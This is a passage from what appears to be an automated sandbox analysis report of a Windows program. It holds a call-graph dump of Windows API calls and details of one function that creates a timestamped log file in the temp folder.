CompareStringW 53083->53085 53083->53103 53084 407535 6 API calls 53084->53103 53086 423bac CompareStringW 53085->53086 53085->53103 53087 423bcf CompareStringW 53086->53087 53086->53103 53089 423bf2 CompareStringW 53087->53089 53087->53103 53088 421943 52 API calls 53088->53103 53090 423c15 CompareStringW 53089->53090 53089->53103 53092 423c38 CompareStringW 53090->53092 53090->53103 53091 409885 72 API calls 53091->53103 53093 423c5e CompareStringW 53092->53093 53092->53103 53094 423c84 CompareStringW 53093->53094 53093->53103 53095 423cb2 CompareStringW 53094->53095 53094->53103 53096 423d1c lstrlenW lstrlenW CompareStringW 53095->53096 53095->53103 53097 423dc1 lstrlenW lstrlenW CompareStringW 53096->53097 53098 423d4c lstrlenW 53096->53098 53099 423df1 lstrlenW 53097->53099 53100 423e69 lstrlenW lstrlenW CompareStringW 53097->53100 53098->53103 53099->53103 53101 423f04 lstrlenW lstrlenW CompareStringW 53100->53101 53102 423e99 lstrlenW 53100->53102 53105 423fc3 lstrlenW lstrlenW CompareStringW 53101->53105 53106 423f38 lstrlenW 53101->53106 53102->53103 53103->53049 53103->53051 53103->53053 53103->53076 53103->53084 53103->53085 53103->53088 53103->53091 53103->53095 53103->53097 53103->53100 53104 403958 52 API calls 53103->53104 53109 42411b lstrlenW lstrlenW CompareStringW 53103->53109 53104->53103 53107 423ff3 lstrlenW 53105->53107 53108 42406c lstrlenW lstrlenW CompareStringW 53105->53108 53111 423f58 53106->53111 53107->53111 53108->53109 53110 42409c lstrlenW 53108->53110 53109->53103 53110->53103 53111->53105 53111->53108 53113 40f2c6 _memcpy_s 53112->53113 53114 40f344 SetFilePointerEx 53113->53114 53115 40f304 GetLastError 53113->53115 53117 40f3a0 ReadFile 53114->53117 53118 40f360 GetLastError 53114->53118 53141 40f310 53115->53141 53119 40f3fa 53117->53119 53120 40f3ba GetLastError 53117->53120 53118->53141 53121 40f416 SetFilePointerEx 53119->53121 53119->53141 53120->53141 53122 40f46a ReadFile 53121->53122 53123 40f42a GetLastError 53121->53123 53124 40f4c7 53122->53124 53125 40f487 GetLastError 53122->53125 53123->53141 53126 40f4e4 SetFilePointerEx 53124->53126 53124->53141 53125->53141 53129 40f54b ReadFile 53126->53129 53130 40f50b GetLastError 53126->53130 53127 451586 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 53128 40834b 53127->53128 53128->52875 53157 41e4e2 53128->53157 53131 40f5a8 ReadFile 53129->53131 53132 40f568 GetLastError 53129->53132 53130->53141 53133 40f605 SetFilePointerEx 53131->53133 53134 40f5c5 GetLastError 53131->53134 53132->53141 53135 40f664 ReadFile 53133->53135 53136 40f624 GetLastError 53133->53136 53134->53141 53137 40f6e8 GetLastError 53135->53137 53138 40f688 53135->53138 53136->53141 53137->53141 53139 40f73a 53138->53139 53140 40f6c2 ReadFile 53138->53140 53138->53141 53153 40f7de 53138->53153 53139->53141 53185 4073cd GetProcessHeap HeapAlloc 53139->53185 53140->53137 53140->53138 53141->53127 53143 40f780 53143->53141 53144 40f7bb SetFilePointerEx 53143->53144 53145 40f7d2 GetLastError 53144->53145 53146 40f81b ReadFile 53144->53146 53145->53153 53147 40f840 GetLastError 53146->53147 53149 40f877 53146->53149 53148 40f84c 53147->53148 53148->53153 53149->53148 53186 405811 GetFileSizeEx GetLastError 53149->53186 53152 40f92e 53187 4073cd GetProcessHeap HeapAlloc 53152->53187 53153->53141 53189 40758b GetProcessHeap HeapFree GetLastError 53153->53189 53155 40f9d6 _memcpy_s 53188 40ef76 GetModuleHandleW GetLastError 53155->53188 53190 46d627 53157->53190 53162 405cbf 52 API calls 53164 41e568 53162->53164 53163 41e71c 53163->52875 53167 41e501 53164->53167 53203 470b7d 53164->53203 53167->53163 53245 404128 GetProcessHeap HeapFree GetLastError 53167->53245 53168 41e607 53242 403958 53168->53242 53169 41e59f 53169->53167 53169->53168 53172 41e5ec 53169->53172 53173 41e5cc 53169->53173 53171 41e5d2 53171->53167 53215 46ce76 53171->53215 53172->53168 53241 465caa 72 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 53172->53241 53175 405cbf 52 API calls 53173->53175 53175->53171 53178 46d627 72 API calls 53179 41e67a 53178->53179 53179->53167 53180 405d77 52 API calls 53179->53180 53181 41e6aa 53180->53181 53181->53167 53182 405cbf 52 API calls 53181->53182 53183 41e6cf 53182->53183 53183->53167 53228 41baa8 53183->53228 53185->53143 53186->53152 53187->53155 53188->53148 53189->53141 53191 46d65f 53190->53191 53199 46d808 53190->53199 53191->53199 53246 46d997 53191->53246 53193 46d84c 53196 451586 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 53193->53196 53198 41e4fb 53196->53198 53198->53167 53200 405d77 53198->53200 53199->53193 53260 404128 GetProcessHeap HeapFree GetLastError 53199->53260 53261 405d90 53200->53261 53202 405d8c 53202->53162 53202->53167 53275 4709fc 53203->53275 53206 470bc2 53208 470c4c 53206->53208 53209 470c3b 53206->53209 53212 470c47 53206->53212 53210 403958 52 API calls 53208->53210 53209->53212 53285 404128 GetProcessHeap HeapFree GetLastError 53209->53285 53210->53212 53211 470c24 RegCloseKey 53211->53206 53212->53169 53214 470b9f 53214->53206 53214->53211 53216 46ce8f 53215->53216 53222 46ceae 53215->53222 53216->53222 53294 46cc59 73 API calls 53216->53294 53218 46cea8 53218->53222 53295 46cc59 73 API calls 53218->53295 53220 46ced3 53221 46cee9 CompareStringW 53220->53221 53220->53222 53221->53222 53223 46cf00 GetLastError 53221->53223 53224 46cf7f 53222->53224 53296 404128 GetProcessHeap HeapFree GetLastError 53222->53296 53223->53222 53226 41e63a 53224->53226 53297 404128 GetProcessHeap HeapFree GetLastError 53224->53297 53226->53167 53226->53178 53298 406d9a 53228->53298 53230 41babc 53231 405cbf 52 API calls 53230->53231 53240 41bac2 53230->53240 53232 41baef 53231->53232 53232->53240 53312 41b8d2 53232->53312 53235 41bbb6 53235->53167 53240->53235 53336 404128 GetProcessHeap HeapFree GetLastError 53240->53336 53241->53168 53450 402a17 53242->53450 53244 40396b 53244->53171 53245->53163 53247 4018a4 68 API calls 53246->53247 53248 46d9b4 53247->53248 53249 46d9ed GetProcAddress 53248->53249 53257 46d9be 53248->53257 53254 46da33 53249->53254 53249->53257 53250 46dac4 53252 46d7f7 53250->53252 53253 46daca FreeLibrary 53250->53253 53251 46dabb CoTaskMemFree 53251->53250 53252->53193 53252->53199 53259 46d47d 53 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 53252->53259 53253->53252 53255 403958 52 API calls 53254->53255 53254->53257 53256 46da71 53255->53256 53256->53257 53258 405cbf 52 API calls 53256->53258 53257->53250 53257->53251 53258->53257 53259->53199 53260->53193 53262 405da0 53261->53262 53263 405e4c 53261->53263 53262->53263 53267 405dab 53262->53267 53264 403958 52 API calls 53263->53264 53268 405dd3 53264->53268 53265 405e29 53266 403958 52 API calls 53265->53266 53266->53268 53267->53265 53269 405dc1 53267->53269 53268->53202 53270 403958 52 API calls 53269->53270 53271 405dcd 53270->53271 53271->53268 53272 405cbf 52 API calls 53271->53272 53273 405def 53272->53273 53273->53268 53274 403485 52 API calls 53273->53274 53274->53268 53276 405d77 52 API calls 53275->53276 53277 470a16 53276->53277 53278 470a1c 53277->53278 53286 467b58 53277->53286 53280 470ab4 53278->53280 53289 404128 GetProcessHeap HeapFree GetLastError 53278->53289 53280->53206 53280->53214 53284 467d44 58 API calls 53280->53284 53283 470a9a RegCloseKey 53283->53278 53284->53214 53285->53212 53290 467b72 53286->53290 53288 467b6e 53288->53278 53288->53283 53289->53280 53291 467b84 53290->53291 53292 467b9d RegOpenKeyExW 53291->53292 53293 467ba4 53292->53293 53293->53288 53294->53218 53295->53220 53296->53224 53297->53226 53299 406db4 53298->53299 53300 406e08 53298->53300 53301 40429c 2 API calls 53299->53301 53337 403471 52 API calls 53300->53337 53303 406dbe 53301->53303 53304 4018a4 68 API calls 53303->53304 53307 406dc4 53303->53307 53305 406df1 53304->53305 53306 406e2e GetProcAddress 53305->53306 53305->53307 53308 406e45 53306->53308 53307->53230 53309 406ece GetLastError 53308->53309 53311 406e89 53308->53311 53338 403471 52 API calls 53308->53338 53309->53311 53311->53307 53339 407406 53312->53339 53314 41b8f7 53315 41b8fd 53314->53315 53316 41b939 53314->53316 53389 40613d 60 API calls 53314->53389 53324 41ba92 53315->53324 53399 404128 GetProcessHeap HeapFree GetLastError 53315->53399 53316->53315 53329 41b9d4 53316->53329 53348 470c62 53316->53348 53319 41ba17 53360 470771 53319->53360 53320 41ba3b 53321 403958 52 API calls 53320->53321 53321->53315 53323 41baa0 53323->53240 53330 470106 UuidCreate 53323->53330 53324->53323 53400 404128 GetProcessHeap HeapFree GetLastError 53324->53400 53329->53315 53329->53319 53329->53320 53331 470149 StringFromGUID2 53330->53331 53332 470136 53330->53332 53331->53332 53333 451586 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 53332->53333 53334 41bb4a 53333->53334 53334->53240 53335 46d0d4 73 API calls 53334->53335 53335->53240 53336->53235 53337->53303 53338->53308 53340 407425 53339->53340 53341 4074ea 53340->53341 53342 40747d 53340->53342 53347 40742b 53340->53347 53403 4073cd GetProcessHeap HeapAlloc 53341->53403 53401 4078fc GetProcessHeap HeapSize 53342->53401 53345 40748c 53345->53347 53402 407684 GetProcessHeap HeapReAlloc 53345->53402 53347->53314 53349 4709fc 54 API calls 53348->53349 53350 470c7b 53349->53350 53351 470c84 53350->53351 53357 470ca7 53350->53357 53404 467faa 53350->53404 53356 470d0f RegCloseKey 53351->53356 53351->53357 53353 470d37 53355 403958 52 API calls 53353->53355 53354 470d26 53358 41b99c 53354->53358 53410 404128 GetProcessHeap HeapFree GetLastError 53354->53410 53355->53358 53356->53357 53357->53353 53357->53354 53357->53358 53358->53315 53358->53329 53390 470388 53358->53390 53361 4018a4 68 API calls 53360->53361 53362 470796 53361->53362 53363 4707ba GetProcAddress 53362->53363 53385 47079c 53362->53385 53364 4707d8 GetCurrentProcess 53363->53364 53381 470838 53363->53381 53439 466e6b 13 API calls 53364->53439 53365 467b58 RegOpenKeyExW 53372 470877 53365->53372 53367 4707e8 53367->53381 53367->53385 53440 46d2f8 77 API calls 53367->53440 53368 4709e7 53370 4709f5 53368->53370 53446 404128 GetProcessHeap HeapFree GetLastError 53368->53446 53369 4709da RegCloseKey 53369->53368 53370->53315 53374 47094d 53372->53374 53372->53385 53427 470680 53372->53427 53374->53385 53444 46d2f8 77 API calls 53374->53444 53375 470813 53375->53385 53441 407535 6 API calls 53375->53441 53380 47097f 53380->53385 53445 407535 6 API calls 53380->53445 53381->53365 53381->53385 53382 4708ee 53382->53385 53386 470680 59 API calls 53382->53386 53385->53368 53385->53369 53387 470926 53386->53387 53387->53374 53387->53385 53443 407535 6 API calls 53387->53443 53389->53316 53391 4703d3 53390->53391 53392 47039c 53390->53392 53448 403471 52 API calls 53391->53448 53394 40429c 2 API calls 53392->53394 53396 4703a7 53394->53396 53395 47040a GetLastError 53395->53396 53396->53395 53398 4703ad 53396->53398 53449 403471 52 API calls 53396->53449 53398->53329 53399->53324 53400->53323 53401->53345 53402->53347 53403->53347 53405 467fd0 53404->53405 53406 467fc1 53404->53406 53409 467fd6 53405->53409 53411 46807b 53405->53411 53406->53405 53426 4078fc GetProcessHeap HeapSize 53406->53426 53409->53351 53410->53358 53412 467237 RegQueryValueExW 53411->53412 53417 4680a5 53412->53417 53413 468202 53413->53409 53414 404128 GetProcessHeap HeapFree GetLastError 53414->53413 53415 4073cd GetProcessHeap HeapAlloc 53415->53417 53416 407684 GetProcessHeap HeapReAlloc 53416->53417 53417->53415 53417->53416 53418 468189 53417->53418 53421 467237 RegQueryValueExW 53417->53421 53423 4680c0 53417->53423 53419 4079cb 56 API calls 53418->53419 53418->53423 53420 4681a9 53419->53420 53422 4681ce lstrlenW 53420->53422 53420->53423 53421->53417 53422->53413 53424 4681ee 53422->53424 53423->53413 53423->53414 53425 40758b GetProcessHeap HeapFree GetLastError 53424->53425 53425->53423 53426->53405 53428 467faa 58 API calls 53427->53428 53429 4706a2 53428->53429 53430 47070d 53429->53430 53431 4706e8 53429->53431 53432 4706c5 53429->53432 53435 403958 52 API calls 53430->53435 53434 470388 53 API calls 53431->53434 53433 470769 53432->53433 53447 404128 GetProcessHeap HeapFree GetLastError 53432->53447 53433->53382 53433->53385 53442 407535 6 API calls 53433->53442 53437 4706f3 53434->53437 53435->53437 53437->53432 53438 405cbf 52 API calls 53437->53438 53438->53432 53439->53367 53440->53375 53441->53381 53442->53382 53443->53374 53444->53380 53445->53385 53446->53370 53447->53433 53448->53396 53449->53396 53451 402a2a 53450->53451 53453 402a35 53450->53453 53452 40429c 2 API calls 53451->53452 53452->53453 53455 402a3b 53453->53455 53456 40294d 52 API calls 53453->53456 53455->53244 53456->53455 53458 4058b1 53457->53458 53459 4058b7 GetLastError 53458->53459 53460 4058ff GlobalAlloc 53458->53460 53462 4058c3 53459->53462 53461 405937 53460->53461 53465 4058d0 53460->53465 53463 405946 GetLastError 53461->53463 53464 405952 53461->53464 53462->53460 53462->53465 53463->53464 53466 4059a4 GetLastError 53464->53466 53468 40595f 53464->53468 53465->52913 53466->53468 53467 4059f3 GlobalFree 53467->53465 53468->53467 53469->52919 53471 46603e 53470->53471 53472 4094f2 53471->53472 53474 4656fb 72 API calls 53471->53474 53472->52719 53472->53016 53474->53472 53476 40cb74 53475->53476 53478 40cbaf 53476->53478 53480 40cbcf 53476->53480 53508 4098a6 53476->53508 53478->53480 53513 409984 54 API calls 53478->53513 53481 451586 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 53480->53481 53482 40cc1a 53481->53482 53482->52984 53483 4104aa 53482->53483 53484 4104ca _memcpy_s 53483->53484 53485 406418 60 API calls 53484->53485 53487 4104ff 53484->53487 53486 41051d 53485->53486 53486->53487 53520 41030a 53486->53520 53489 41057d 53487->53489 53532 404128 GetProcessHeap HeapFree GetLastError 53487->53532 53489->52984 53491 4102e9 8 API calls 53489->53491 53491->52960 53492->52964 53493->52972 53494->52974 53495->52984 53496->52981 53497->52983 53498->52987 53499->52986 53500->52988 53501->52991 53502->52994 53503->52996 53504->52963 53505->52965 53506->52967 53507->52970 53514 409a72 53508->53514 53510 4098c0 53511 4098c6 53510->53511 53519 40b67a 52 API calls _memcpy_s 53510->53519 53511->53476 53513->53478 53515 409a8c CompareStringW 53514->53515 53518 409ae9 53514->53518 53516 409ab9 53515->53516 53516->53515 53517 409add GetLastError 53516->53517 53516->53518 53517->53518 53518->53510 53519->53511 53521 41033c CreateFileW 53520->53521 53522 4103af GetCurrentProcess GetCurrentProcess DuplicateHandle 53520->53522 53523 410360 GetLastError 53521->53523 53524 410409 SetFilePointerEx 53521->53524 53522->53524 53525 4103cf GetLastError 53522->53525 53529 41036c 53523->53529 53528 41042a GetLastError 53524->53528 53530 41046b 53524->53530 53526 410398 53525->53526 53526->53487 53528->53526 53529->53526 53530->53526 53533 43a11b 53530->53533 53532->53489 53534 403958 52 API calls 53533->53534 53535 43a137 53534->53535 53536 43a154 CreateEventW 53535->53536 53537 43a13d 53535->53537 53538 43a166 GetLastError 53536->53538 53539 43a1aa CreateEventW 53536->53539 53537->53526 53538->53537 53540 43a1f3 CreateThread 53539->53540 53541 43a1bc GetLastError 53539->53541 53542 43a244 53540->53542 53543 43a20a GetLastError 53540->53543 53558 439a90 CoInitializeEx 53540->53558 53541->53537 53545 439eb4 53542->53545 53543->53537 53554 4016ca WaitForMultipleObjects 53545->53554 53547 439ee2 53548 439ee9 53547->53548 53549 439f14 53547->53549 53550 439f6c ResetEvent 53547->53550 53548->53537 53549->53548 53552 439f1d GetExitCodeThread 53549->53552 53550->53548 53551 439f79 GetLastError 53550->53551 53551->53548 53552->53548 53553 439f32 GetLastError 53552->53553 53553->53548 53555 4016f8 53554->53555 53557 4016ee 53554->53557 53556 40175c GetLastError 53555->53556 53555->53557 53556->53557 53557->53547 53559 439ac1 53558->53559 53571 439ae5 53558->53571 53560 451586 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 53559->53560 53561 439d72 53560->53561 53562 439c5a SetEvent 53563 439cb0 53562->53563 53564 439c67 GetLastError 53562->53564 53572 4017b5 WaitForSingleObject GetLastError 53563->53572 53568 439b35 53564->53568 53566 439d5d CoUninitialize 53566->53559 53567 439cba 53567->53568 53569 439cd9 ResetEvent 53567->53569 53568->53566 53569->53568 53570 439ce6 GetLastError 53569->53570 53570->53568 53571->53562 53571->53568 53572->53567 53574 4660f1 53573->53574 53575 4660b8 53573->53575 53577 405d77 52 API calls 53574->53577 53575->53574 53576 4660bd 53575->53576 53607 405e84 53576->53607 53582 466100 53577->53582 53579 4660d6 53580 46624e 53579->53580 53581 466249 53579->53581 53602 4660e0 53579->53602 53586 4663a6 10 API calls 53580->53586 53598 46626c 53580->53598 53657 465ec5 90 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 53581->53657 53584 466132 53582->53584 53582->53602 53641 40613d 60 API calls 53582->53641 53584->53602 53642 4065c3 53584->53642 53585 4662a8 LeaveCriticalSection 53590 4662c1 53585->53590 53591 4662b9 53585->53591 53592 46625d 53586->53592 53588 403958 52 API calls 53588->53602 53595 419e72 53590->53595 53660 404128 GetProcessHeap HeapFree GetLastError 53590->53660 53659 404128 GetProcessHeap HeapFree GetLastError 53591->53659 53592->53598 53658 404128 GetProcessHeap HeapFree GetLastError 53592->53658 53593 466165 53593->53602 53646 40241c CreateDirectoryW 53593->53646 53595->53004 53595->53007 53598->53585 53598->53588 53600 466188 53601 4661b2 CreateFileW 53600->53601 53600->53602 53603 4661e8 GetLastError 53601->53603 53605 4661f4 53601->53605 53602->53585 53603->53605 53604 466233 SetFilePointer 53604->53579 53605->53579 53605->53604 53606 466201 53605->53606 53606->53602 53608 405ed6 53607->53608 53609 405f0f 53607->53609 53608->53609 53610 405edb 53608->53610 53611 406d9a 70 API calls 53609->53611 53612 405d90 52 API calls 53610->53612 53613 405f19 53611->53613 53614 405ee8 53612->53614 53615 405d90 52 API calls 53613->53615 53624 405eee 53613->53624 53616 4065c3 52 API calls 53614->53616 53614->53624 53615->53614 53617 405f64 53616->53617 53618 40241c 5 API calls 53617->53618 53634 405f71 53617->53634 53618->53634 53619 406100 53622 40610e 53619->53622 53662 404128 GetProcessHeap HeapFree GetLastError 53619->53662 53620 405fad GetLocalTime 53620->53634 53623 40611c 53622->53623 53663 404128 GetProcessHeap HeapFree GetLastError 53622->53663 53627 40612a 53623->53627 53664 404128 GetProcessHeap HeapFree GetLastError 53623->53664 53624->53619 53661 404128 GetProcessHeap HeapFree GetLastError 53624->53661 53630 451586 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 53627->53630 53628 403578 56 API calls 53628->53634 53632 406139 53630->53632 53631 406011 CreateFileW 53633 406033 GetLastError 53631->53633 53640 40607c 53631->53640 53632->53579 53633->53634 53635 406045 Sleep 53633->53635 53634->53620 53634->53624 53634->53628 53634->53631 53634->53635 53636 4060a5 53634->53636 53634->53640 53635->53634 53637 406055 53635->53637 53636->53624 53639 4060eb CloseHandle 53636->53639 53637->53634 53638 403958 52 API calls 53638->53636 53639->53624 53640->53636 53640->53638 53641->53584 53643 4065d6 53642->53643 53645 406615 53642->53645 53644 403958 52 API calls 53643->53644 53643->53645 53644->53645 53645->53593 53647 402438 GetLastError 53646->53647 53654 402445 53646->53654 53648 40244c 53647->53648 53647->53654 53649 40252b GetFileAttributesW 53648->53649 53650 402459 53648->53650 53649->53650 53651 40241c GetFileAttributesW 53650->53651 53650->53654 53652 40249c 53651->53652 53653 4024c4 CreateDirectoryW 53652->53653 53652->53654 53655 4024d2 GetLastError 53653->53655 53656 4024e2 53653->53656 53654->53600 53655->53656 53656->53654 53657->53580 53658->53598 53659->53590 53660->53595 53661->53619 53662->53622 53663->53623 53664->53627 53668 465a96 53667->53668 53669 465ad2 53668->53669 53673 465aff 53668->53673 53674 465a9c 53668->53674 53675 403bee 6 API calls 53669->53675 53671 465b04 WriteFile 53672 465b1f GetLastError 53671->53672 53671->53673 53672->53673 53673->53671 53673->53674 53674->53031 53675->53674 53676->52755 53678 459a1c 53677->53678 53679 459a0a 53677->53679 53689 45988d 53678->53689 53704 451eea GetModuleHandleW 53679->53704 53683 4517e5 53683->52583 53684 459a0f 53684->53678 53705 459abe GetModuleHandleExW 53684->53705 53687 459a6e 53690 459899 __FrameHandler3::FrameUnwindToState 53689->53690 53711 45cf31 EnterCriticalSection 53690->53711 53692 4598a3 53712 4598f5 53692->53712 53694 4598b0 53716 4598ce 53694->53716 53697 459a74 53721 459aa5 53697->53721 53699 459a7e 53700 459a92 53699->53700 53701 459a82 GetCurrentProcess TerminateProcess 53699->53701 53702 459abe CallUnexpected 3 API calls 53700->53702 53701->53700 53703 459a9a ExitProcess 53702->53703 53704->53684 53706 459afd GetProcAddress 53705->53706 53707 459b1e 53705->53707 53706->53707 53708 459b11 53706->53708 53709 459b24 FreeLibrary 53707->53709 53710 459a1b 53707->53710 53708->53707 53709->53710 53710->53678 53711->53692 53714 459901 __FrameHandler3::FrameUnwindToState CallUnexpected 53712->53714 53713 459965 CallUnexpected 53713->53694 53714->53713 53719 459fed 14 API calls 2 library calls 53714->53719 53720 45cf81 LeaveCriticalSection 53716->53720 53718 4598bc 53718->53683 53718->53697 53719->53713 53720->53718 53724 45cfbd 5 API calls CallUnexpected 53721->53724 53723 459aaa CallUnexpected 53723->53699 53724->53723 53748 40a810 57 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 53822 40af10 67 API calls 52465 439110 CompareStringA 52466 43914f GetCurrentProcess GetCurrentProcess DuplicateHandle 52465->52466 52467 4391fc CreateFileA 52465->52467 52468 439170 GetLastError 52466->52468 52469 4391bf 52466->52469 52470 43921c GetLastError 52467->52470 52472 43917c 52467->52472 52468->52472 52474 438f71 6 API calls 52469->52474 52473 439228 52470->52473 52473->52472 52474->52472 53751 43ba10 89 API calls 53824 45bd10 15 API calls 53753 40ac20 GetProcessHeap HeapFree GetLastError GetProcessHeap HeapSize 53754 40ae20 15 API calls 53826 454f24 41 API calls 4 library calls 53756 424c20 58 API calls 53828 40a530 6 API calls 53830 439330 SetFilePointerEx GetLastError 53762 4390c0 32 API calls 53763 448ec0 63 API calls 53835 45b3c0 15 API calls 2 library calls 53836 4555c3 54 API calls 3 library calls 53765 40b0d0 53 API calls 53766 40aad0 54 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 53838 40a5d0 87 API calls 53841 454fd1 52 API calls 4 library calls 53842 45ddd0 FreeLibrary 53768 466ed0 WaitForSingleObject GetLastError GetExitCodeProcess GetLastError 53769 4620df 20 API calls __vsnwprintf_l 53770 4084e0 10 API calls 53771 40a4e0 6 API calls 52447 4766e6 52448 4766f0 52447->52448 52449 407e32 ___delayLoadHelper2@8 16 API calls 52448->52449 52450 4766fd 52449->52450 53772 43a6e0 CompareStringW CompareStringOrdinal GetLastError 53847 40a9f0 52 API calls 53848 40aff0 67 API calls 53774 45cef0 7 API calls 52391 407b80 52392 407b5f 52391->52392 52392->52391 52394 407e32 52392->52394 52420 407b90 52394->52420 52397 407e9f 52398 407dd0 DloadReleaseSectionWriteAccess 8 API calls 52397->52398 52399 407eaa RaiseException 52398->52399 52400 408098 52399->52400 52400->52392 52401 407f3b LoadLibraryExA 52402 407f9c 52401->52402 52403 407f4e GetLastError 52401->52403 52407 407fae 52402->52407 52409 407fa7 FreeLibrary 52402->52409 52404 407f61 52403->52404 52405 407f77 52403->52405 52404->52402 52404->52405 52410 407dd0 DloadReleaseSectionWriteAccess 8 API calls 52405->52410 52406 40800c GetProcAddress 52411 40801c GetLastError 52406->52411 52416 40806a 52406->52416 52407->52406 52407->52416 52408 407ec3 52408->52401 52408->52402 52408->52407 52408->52416 52409->52407 52412 407f82 RaiseException 52410->52412 52413 40802f 52411->52413 52412->52400 52415 407dd0 DloadReleaseSectionWriteAccess 8 API calls 52413->52415 52413->52416 52417 408050 RaiseException 52415->52417 52426 407dd0 52416->52426 52418 407b90 ___delayLoadHelper2@8 7 API calls 52417->52418 52419 408067 52418->52419 52419->52416 52421 407bbd 52420->52421 52422 407b9c 52420->52422 52421->52397 52421->52408 52434 407c39 52422->52434 52424 407ba1 52424->52421 52439 407d62 52424->52439 52427 407de2 52426->52427 52428 407e04 52426->52428 52429 407c39 DloadReleaseSectionWriteAccess 4 API calls 52427->52429 52428->52400 52430 407de7 52429->52430 52431 407dff 52430->52431 52432 407d62 DloadProtectSection 3 API calls 52430->52432 52446 407e06 GetModuleHandleW GetProcAddress GetProcAddress RtlReleaseSRWLockExclusive DloadReleaseSectionWriteAccess 52431->52446 52432->52431 52444 407bc3 GetModuleHandleW GetProcAddress GetProcAddress 52434->52444 52436 407c3e 52437 407c5a 52436->52437 52438 407c56 RtlAcquireSRWLockExclusive 52436->52438 52437->52424 52438->52424 52440 407d77 DloadProtectSection 52439->52440 52441 407db2 VirtualProtect 52440->52441 52442 407d7d 52440->52442 52445 407c78 VirtualQuery GetSystemInfo 52440->52445 52441->52442 52442->52421 52444->52436 52445->52441 52446->52428 53850 40a580 6 API calls 52455 439280 52460 439dd1 52455->52460 52457 4392af ReadFile 52458 4392c7 GetLastError 52457->52458 52459 4392d3 52457->52459 52458->52459 52461 439de6 52460->52461 52462 439dec SetFilePointerEx 52461->52462 52464 439e0f 52461->52464 52463 439e03 GetLastError 52462->52463 52462->52464 52463->52464 52464->52457 53851 438780 72 API calls 53780 45de80 GetProcessHeap 53781 462c80 IsProcessorFeaturePresent 53853 45c383 44 API calls 2 library calls 53854 476581 16 API calls ___delayLoadHelper2@8 53783 45928b 42 API calls 2 library calls 53784 40ae90 17 API calls 53856 40b390 79 API calls 2 library calls 53786 42ba90 19 API calls 53788 45b490 75 API calls 2 library calls 53789 45cc90 GetCommandLineA GetCommandLineW 53858 451793 14 API calls 53792 40a6a0 54 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 53863 40aba0 9 API calls 53866 42bfa0 98 API calls 53868 44a7a0 92 API calls 53869 4515a0 49 API calls __RTC_Initialize 53796 4080b0 73 API calls 53871 4285b0 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 53797 4390b0 GetProcessHeap HeapFree GetLastError 53872 43abb0 95 API calls 53798 45bcb0 46 API calls 2 library calls 53874 4595bd 44 API calls __freea

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 00405E84 Relevance: 28.3, APIs: 5, Strings: 11, Instructions: 252sleepfiletimeCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 600 405e84-405ed4 601 405ed6-405ed9 600->601 602 405f0f-405f1d call 406d9a 600->602 601->602 603 405edb-405eec call 405d90 601->603 608 405f30-405f45 call 405d90 602->608 609 405f1f-405f2e 602->609 610 405f58-405f66 call 4065c3 603->610 611 405eee-405ef8 603->611 608->610 619 405f47-405f56 608->619 612 405efd-405f0a call 4012a1 609->612 620 405f68-405f6c call 40241c 610->620 621 405f9b-405fa0 610->621 611->612 622 4060f2-4060f6 612->622 619->612 628 405f71-405f75 620->628 624 405fa2-405fa7 621->624 625 405faa 621->625 626 406100-406104 622->626 627 4060f8-4060fb call 404128 622->627 624->625 629 405fad-405fcb GetLocalTime 625->629 631 406106-406109 call 404128 626->631 632 40610e-406112 626->632 627->626 628->621 635 405f77-405f96 call 4012a1 628->635 636 405fd2-40600b call 403578 629->636 637 405fcd 629->637 631->632 633 406114-406117 call 404128 632->633 634 40611c-406120 632->634 633->634 640 406122-406125 call 404128 634->640 641 40612a-40613a call 451586 634->641 635->622 648 406011-406031 CreateFileW 636->648 649 4060ca-4060d4 636->649 637->636 640->641 651 406093-406098 648->651 652 406033-40603e GetLastError 648->652 653 4060d9-4060e3 call 4012a1 649->653 657 40609a-4060a9 call 403958 651->657 658 4060bc-4060c1 651->658 654 406040-406043 652->654 655 406045-406053 Sleep 652->655 661 4060e6-4060e9 653->661 654->655 659 40605c 654->659 662 406055-40605a 655->662 663 40605f-406061 655->663 657->658 670 4060ab-4060ba 657->670 660 4060c3-4060c8 658->660 658->661 659->663 660->661 661->622 669 4060eb-4060ec CloseHandle 661->669 662->663 667 406063-40606c 663->667 668 40606e 663->668 667->668 671 406070-406072 668->671 672 40607c-406089 668->672 669->622 670->653 671->651 673 406074-406077 671->673 672->651 673->629
                                                                                                                                                          APIs
                                                                                                                                                          • GetLocalTime.KERNEL32(00000000,00000000,00000001,0000000C,00000000,?,00000000,00000000,0000000C,00000000,00000000,00000000,00000000,00481EB0,?,00000000), ref: 00405FB7
                                                                                                                                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00406026
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00406033
                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 00406047
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004060EC
                                                                                                                                                          Strings
                                                                                                                                                          • $yG, xrefs: 00405FC6
                                                                                                                                                          • Failed to copy temp path to return., xrefs: 004060AB
                                                                                                                                                          • Failed to get temp folder., xrefs: 00405F1F
                                                                                                                                                          • %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00405FF9
                                                                                                                                                          • Failed to concatenate the temp folder and log prefix., xrefs: 00405F47
                                                                                                                                                          • failed to allocate memory for the temp path, xrefs: 004060CA
                                                                                                                                                          • $yG, xrefs: 00405FA2
